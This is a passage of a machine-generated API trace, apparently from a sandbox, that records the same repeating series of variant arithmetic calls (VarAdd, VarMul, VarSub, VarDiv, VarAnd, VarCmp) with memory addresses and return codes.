pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.413] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.413] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.413] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.413] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.413] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.413] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.413] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.413] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.413] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.413] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.413] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.413] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.413] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.413] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.413] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.413] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.413] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.413] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.413] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.413] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.413] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.413] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.413] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.413] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.414] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.414] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.414] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.414] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.414] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.414] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.414] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.414] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.414] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.414] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.414] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.414] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.414] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.414] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.414] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.414] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.414] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.414] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.414] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.414] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.414] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.414] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.414] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.414] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.414] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.414] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.414] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.414] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.414] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.414] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.415] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.415] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.415] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.415] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.415] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.415] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.415] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.415] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.415] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.415] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.415] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.415] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.415] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.415] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.415] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.415] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.415] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.415] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.415] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.415] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.415] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.415] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.415] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.415] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.415] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.415] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.415] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.415] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.415] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.415] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.415] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.416] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.416] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.416] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.416] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.416] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.416] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.416] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.416] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.416] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.416] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.416] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.416] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.416] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.416] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.416] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.416] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.416] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.416] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.416] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.416] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.416] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.416] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.416] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.416] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.416] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.416] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.417] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.417] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.417] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.417] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.417] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.417] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.417] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.417] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.417] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.417] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.417] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.417] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.417] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.417] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.417] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.417] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.417] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.417] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.417] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.417] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.417] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.417] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.417] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.417] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.417] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.417] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.417] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.418] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.418] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.418] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.418] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.418] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.418] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.418] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.418] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.418] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.418] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.418] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.418] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.418] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.418] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.418] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.418] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.418] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.418] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.418] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.418] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.418] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.418] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.418] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.418] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.418] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.418] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.418] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.418] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.419] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.419] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.419] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.419] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.419] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.419] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.419] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.419] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.419] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.419] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.419] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.419] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.419] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.419] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.419] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.419] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.419] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.419] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.419] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.419] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.419] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.419] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.419] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.419] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.419] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.419] VarMul (in: pvarLeft=0x18fb88, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.419] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.419] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.419] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.419] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.419] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.420] VarSub (in: pvarLeft=0x18f9f0, pvarRight=0x18f9c0, pvarResult=0x18f9e0 | out: pvarResult=0x18f9e0) returned 0x0 [0069.420] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.420] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.420] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.420] 